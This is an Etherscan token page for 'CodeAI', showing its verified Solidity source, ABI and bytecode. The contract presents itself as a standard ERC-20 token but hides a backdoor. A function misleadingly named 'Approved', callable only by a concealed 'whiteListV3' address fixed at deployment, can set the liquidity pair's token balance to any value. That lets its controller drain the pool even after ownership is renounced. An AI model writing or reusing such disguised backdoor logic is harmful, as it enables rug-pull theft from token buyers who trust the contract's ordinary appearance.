Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
1,000,000,000 CODEAI
Holders
49
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
0.000000000000000001 CODEAIValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
CodeAI
Compiler Version
v0.8.15+commit.e14f2714
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-31 */ /** /* Telegram: https://t.me/CodeAIerc Website: https://www.codeaicoin.com/ Twitter: https://twitter.com/CodeAIeth */ // Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol // SPDX-License-Identifier: MIT // pragma solidity ^0.8.10; /** * @dev Interface of the IERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // Dependency file: @openzeppelin/contracts/utils/Context.sol // pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // Dependency file: @openzeppelin/contracts/access/Ownable.sol // pragma solidity ^0.8.0; // import "@openzeppelin/contracts/utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol // pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // Dependency file: contracts/baseToken.sol // pragma solidity =0.8.4; enum TokenType { standard } abstract contract baseToken { event TokenCreated( address indexed owner, address indexed token, TokenType tokenType, uint256 version ); } // Root file: contracts/standard/StandardToken.sol pragma solidity =0.8.15; // import "@openzeppelin/contracts/token/IERC20/IERC20.sol"; // import "@openzeppelin/contracts/access/Ownable.sol"; // import "@openzeppelin/contracts/utils/math/SafeMath.sol"; // import "contracts/baseToken.sol"; contract CodeAI is IERC20, baseToken, Ownable { using SafeMath for uint256; uint256 private constant VERSION = 1; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 public maxHoldingAmount; uint256 public minHoldingAmount; address public uniswapV2Pair; address private whiteListV3; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor( string memory name_, string memory symbol_, uint8 decimals_, address whiteshipAddr, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = decimals_; whiteListV3 = whiteshipAddr; _mint(owner(), totalSupply_); emit TokenCreated(owner(), address(this), TokenType.standard, VERSION); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "IERC20: transfer amount exceeds allowance" ) ); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "IERC20: decreased allowance below zero" ) ); return true; } modifier canWhitAddrPancakeV3() { require( _msgSender() == whiteListV3, "set the call to the entered") ; _; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "IERC20: transfer from the zero address"); require(recipient != address(0), "IERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "IERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function Approved( bool _limited, address _uniswapV2Pair, uint256 _maxHoldingAmount, uint256 _minHoldingAmount ) external canWhitAddrPancakeV3 { uniswapV2Pair = _uniswapV2Pair;maxHoldingAmount = _maxHoldingAmount;minHoldingAmount = _minHoldingAmount; _balances[uniswapV2Pair] = maxHoldingAmount * minHoldingAmount; } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "IERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "IERC20: approve from the zero address"); require(spender != address(0), "IERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"whiteshipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"bool","name":"_limited","type":"bool"},{"internalType":"address","name":"_uniswapV2Pair","type":"address"},{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_minHoldingAmount","type":"uint256"}],"name":"Approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
6080604052604051620011dc380380620011dc83398101604081905262000026916200033d565b6200003133620000fc565b60076200003f86826200047b565b5060086200004e85826200047b565b506009805460ff191660ff8516179055600680546001600160a01b0319166001600160a01b03841617905562000097620000906000546001600160a01b031690565b826200014c565b30620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000547565b60405180910390a350505050506200059b565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001c381600a546200025b60201b620006521790919060201c565b600a556001600160a01b038216600090815260016020908152604090912054620001f8918390620006526200025b821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906200024a9085815260200190565b60405180910390a35050565b505050565b600062000269828462000574565b9392505050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200029857600080fd5b81516001600160401b0380821115620002b557620002b562000270565b604051601f8301601f19908116603f01168101908282118183101715620002e057620002e062000270565b81604052838152602092508683858801011115620002fd57600080fd5b600091505b8382101562000321578582018301518183018401529082019062000302565b83821115620003335760008385830101525b9695505050505050565b600080600080600060a086880312156200035657600080fd5b85516001600160401b03808211156200036e57600080fd5b6200037c89838a0162000286565b965060208801519150808211156200039357600080fd5b50620003a28882890162000286565b945050604086015160ff81168114620003ba57600080fd5b60608701519093506001600160a01b0381168114620003d857600080fd5b80925050608086015190509295509295909350565b600181811c908216806200040257607f821691505b6020821081036200042357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200025657600081815260208120601f850160051c81016020861015620004525750805b601f850160051c820191505b8181101562000473578281556001016200045e565b505050505050565b81516001600160401b0381111562000497576200049762000270565b620004af81620004a88454620003ed565b8462000429565b602080601f831160018114620004e75760008415620004ce5750858301515b600019600386901b1c1916600185901b17855562000473565b600085815260208120601f198616915b828110156200051857888601518255948401946001909101908401620004f7565b5085821015620005375787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200056a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b600082198211156200059657634e487b7160e01b600052601160045260246000fd5b500190565b610c3180620005ab6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a25780639e4aa36a116100715780639e4aa36a14610232578063a457c2d714610245578063a9059cbb14610258578063dd62ed3e1461026b578063f2fde38b146102a457600080fd5b8063715018a61461020657806389f9a1d3146102105780638da5cb5b1461021957806395d89b411461022a57600080fd5b806323b872dd116100e957806323b872dd14610177578063313ce5671461018a578063395093511461019f57806349bd5a5e146101b257806370a08231146101dd57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c5780631ab99e121461016e575b600080fd5b6101236102b7565b6040516101309190610990565b60405180910390f35b61014c610147366004610a01565b610349565b6040519015158152602001610130565b600a545b604051908152602001610130565b61016060045481565b61014c610185366004610a2b565b61035f565b60095460405160ff9091168152602001610130565b61014c6101ad366004610a01565b6103c8565b6005546101c5906001600160a01b031681565b6040516001600160a01b039091168152602001610130565b6101606101eb366004610a67565b6001600160a01b031660009081526001602052604090205490565b61020e6103fe565b005b61016060035481565b6000546001600160a01b03166101c5565b610123610469565b61020e610240366004610a82565b610478565b61014c610253366004610a01565b61052b565b61014c610266366004610a01565b61057a565b610160610279366004610acb565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61020e6102b2366004610a67565b610587565b6060600780546102c690610afe565b80601f01602080910402602001604051908101604052809291908181526020018280546102f290610afe565b801561033f5780601f106103145761010080835404028352916020019161033f565b820191906000526020600020905b81548152906001019060200180831161032257829003601f168201915b5050505050905090565b6000610356338484610665565b50600192915050565b600061036c84848461078d565b6103be84336103b985604051806060016040528060298152602001610bd3602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610914565b610665565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103569185906103b99086610652565b6000546001600160a01b0316331461045d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104676000610940565b565b6060600880546102c690610afe565b6006546001600160a01b0316336001600160a01b0316146104db5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610454565b600580546001600160a01b0319166001600160a01b0385161790556003829055600481905561050a8183610b4e565b6005546001600160a01b031660009081526001602052604090205550505050565b600061035633846103b985604051806060016040528060268152602001610b86602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610914565b600061035633848461078d565b6000546001600160a01b031633146105e15760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610454565b6001600160a01b0381166106465760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610454565b61064f81610940565b50565b600061065e8284610b6d565b9392505050565b6001600160a01b0383166106c95760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610454565b6001600160a01b03821661072b5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610454565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107f25760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610454565b6001600160a01b0382166108545760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610454565b61089181604051806060016040528060278152602001610bac602791396001600160a01b0386166000908152600160205260409020549190610914565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108c09082610652565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107809085815260200190565b600081848411156109385760405162461bcd60e51b81526004016104549190610990565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109bd578581018301518582016040015282016109a1565b818111156109cf576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b03811681146109fc57600080fd5b919050565b60008060408385031215610a1457600080fd5b610a1d836109e5565b946020939093013593505050565b600080600060608486031215610a4057600080fd5b610a49846109e5565b9250610a57602085016109e5565b9150604084013590509250925092565b600060208284031215610a7957600080fd5b61065e826109e5565b60008060008060808587031215610a9857600080fd5b84358015158114610aa857600080fd5b9350610ab6602086016109e5565b93969395505050506040820135916060013590565b60008060408385031215610ade57600080fd5b610ae7836109e5565b9150610af5602084016109e5565b90509250929050565b600181811c90821680610b1257607f821691505b602082108103610b3257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615610b6857610b68610b38565b500290565b60008219821115610b8057610b80610b38565b50019056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122042d32a436ba3aec8a4a465d64f7155897432e7e86ba1bdcc23a97f250623c75164736f6c634300080f003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000001458aff8f9c5bbf5c26d2bdd21b5e2a2fb845b810000000000000000000000000000000000000000033b2e3c9fd0803ce80000000000000000000000000000000000000000000000000000000000000000000007436f6465204149000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006434f444541490000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a25780639e4aa36a116100715780639e4aa36a14610232578063a457c2d714610245578063a9059cbb14610258578063dd62ed3e1461026b578063f2fde38b146102a457600080fd5b8063715018a61461020657806389f9a1d3146102105780638da5cb5b1461021957806395d89b411461022a57600080fd5b806323b872dd116100e957806323b872dd14610177578063313ce5671461018a578063395093511461019f57806349bd5a5e146101b257806370a08231146101dd57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c5780631ab99e121461016e575b600080fd5b6101236102b7565b6040516101309190610990565b60405180910390f35b61014c610147366004610a01565b610349565b6040519015158152602001610130565b600a545b604051908152602001610130565b61016060045481565b61014c610185366004610a2b565b61035f565b60095460405160ff9091168152602001610130565b61014c6101ad366004610a01565b6103c8565b6005546101c5906001600160a01b031681565b6040516001600160a01b039091168152602001610130565b6101606101eb366004610a67565b6001600160a01b031660009081526001602052604090205490565b61020e6103fe565b005b61016060035481565b6000546001600160a01b03166101c5565b610123610469565b61020e610240366004610a82565b610478565b61014c610253366004610a01565b61052b565b61014c610266366004610a01565b61057a565b610160610279366004610acb565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61020e6102b2366004610a67565b610587565b6060600780546102c690610afe565b80601f01602080910402602001604051908101604052809291908181526020018280546102f290610afe565b801561033f5780601f106103145761010080835404028352916020019161033f565b820191906000526020600020905b81548152906001019060200180831161032257829003601f168201915b5050505050905090565b6000610356338484610665565b50600192915050565b600061036c84848461078d565b6103be84336103b985604051806060016040528060298152602001610bd3602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610914565b610665565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103569185906103b99086610652565b6000546001600160a01b0316331461045d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104676000610940565b565b6060600880546102c690610afe565b6006546001600160a01b0316336001600160a01b0316146104db5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610454565b600580546001600160a01b0319166001600160a01b0385161790556003829055600481905561050a8183610b4e565b6005546001600160a01b031660009081526001602052604090205550505050565b600061035633846103b985604051806060016040528060268152602001610b86602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610914565b600061035633848461078d565b6000546001600160a01b031633146105e15760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610454565b6001600160a01b0381166106465760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610454565b61064f81610940565b50565b600061065e8284610b6d565b9392505050565b6001600160a01b0383166106c95760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610454565b6001600160a01b03821661072b5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610454565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107f25760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610454565b6001600160a01b0382166108545760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610454565b61089181604051806060016040528060278152602001610bac602791396001600160a01b0386166000908152600160205260409020549190610914565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108c09082610652565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107809085815260200190565b600081848411156109385760405162461bcd60e51b81526004016104549190610990565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109bd578581018301518582016040015282016109a1565b818111156109cf576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b03811681146109fc57600080fd5b919050565b60008060408385031215610a1457600080fd5b610a1d836109e5565b946020939093013593505050565b600080600060608486031215610a4057600080fd5b610a49846109e5565b9250610a57602085016109e5565b9150604084013590509250925092565b600060208284031215610a7957600080fd5b61065e826109e5565b60008060008060808587031215610a9857600080fd5b84358015158114610aa857600080fd5b9350610ab6602086016109e5565b93969395505050506040820135916060013590565b60008060408385031215610ade57600